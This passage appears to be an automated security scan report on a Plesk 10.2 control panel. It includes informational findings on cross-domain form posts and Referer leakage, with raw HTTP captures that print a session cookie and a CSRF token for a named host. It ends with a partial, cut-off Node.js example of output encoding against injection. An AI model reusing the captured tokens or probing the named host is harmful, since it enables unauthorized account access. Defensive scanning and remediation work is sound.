<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

7. Cross-domain POST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/register-domain/

Issue detail

The page contains a form which POSTs data to the domain myplesk.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /plesk/client@2/register-domain/?cmd=doms_reg&mpc_connect=true HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/add-domain/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:26 GMT
Connection: close
Content-Length: 882

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head>
<body onLoad="document.forms[0].submit()">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000000"> Contacting service, please wait ...
<form action="https://myplesk.com/master/handler2.php" method="post"><input type="hidden" name="data" value="U2FsdGVkX1%2FyIGe%2FjsHNpR7puuVkQC7nDLmcHh6hDUSa1t2iYWWYagumHhJ4BiUL%0AU%2BlyN31QdiUGmPELiqbWC4xq6STnuIMAxDSGAS9W6CkFbBM8POKmB%2F81dYVDjABz%0AiboBj0hHQiBlip8P45nsgVTYMN4boTPKrE0t7wvHbeT3pQ66qlcXD5TnIoecW2U7%0A5NEDpxWTUNr%2B7Qluqt%2FqmtE6duMjNgv9lpiZICoXc7seKJYgoyu0wu8TInrpEtVZ%0AL5DB2PPmUp4FT6gPp45EhgO9UI6NvdfygVQ%2F%2FgcyHXGYbH%2FTsCHTxAkti1DHlp09%0AsfFYrtDZ2CIOanHNwkhbuO7UT6zllZKDj85BYODmSFw%3D">
</form>
</body>
</html>

8. Cross-domain Referer leakage
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 54609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/";
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/";
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>
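The file listing further down in this same response places each file or directory name into several distinct HTML contexts: element text (the link label), double-quoted attribute values (`id="del_App_Data"`, `value="App_Data"`), the `file=` query parameter of the `cmd=chdir` links (percent-encoded, `%2Fhttpdocs%2FApp_Data%2F`), and a JavaScript string literal inside an event-handler attribute (`onMouseOver="f(event, &#039;dir&#039;);"`). The captured markup entity-encodes its handler attributes with `&quot;`, `&#039;` and `&#123;`, which is the right treatment for that context. The Node.js script below is an added example, not Plesk code and not part of the XSS.CX report: it gives one encoder per context, renders a listing row in the same shape as the captured rows through those encoders, and checks that a hostile name cannot add a tag. The helper names (`encodeHtmlText`, `renderRow`, `tagCount`, `demo`) and the two hostile file names are this example's own constructions.

```javascript
// Added example (not Plesk code): one encoder per output context in which the
// file-manager listing captured on this page places a file name, plus a check
// that a constructed hostile name cannot add markup or break out of a handler.
//
// Contexts visible in the captured response:
//   1. element text           ...onClick=";lon();">App_Data</a>
//   2. quoted attribute       id="del_App_Data" value="App_Data"
//   3. URL query parameter    ?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F
//   4. JS string literal inside an event-handler attribute
//                             onMouseOver="f(event, &#039;dir&#039;);"
// Helper names (encodeHtmlText, renderRow, tagCount, demo) are this example's own.

function encodeHtmlText(s) {
  return String(s).replace(/[&<>]/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' }[c]));
}

function encodeHtmlAttr(s) {
  // Quoted attribute value. Both quote characters are encoded so the same
  // function is safe whichever quote style the template uses.
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;'
  }[c]));
}

function encodeJsStringInAttr(s) {
  // Two layers, innermost first: escape for a JS string literal, then for the
  // HTML attribute that carries the handler. The browser decodes the entities
  // before the JS parser runs, so the JS layer is what finally stops a quote
  // from closing the literal. \u escapes survive both steps unchanged.
  const js = String(s).replace(/[\\'"<>&\r\n\u2028\u2029]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return encodeHtmlAttr(js);
}

function encodeQueryParam(s) {
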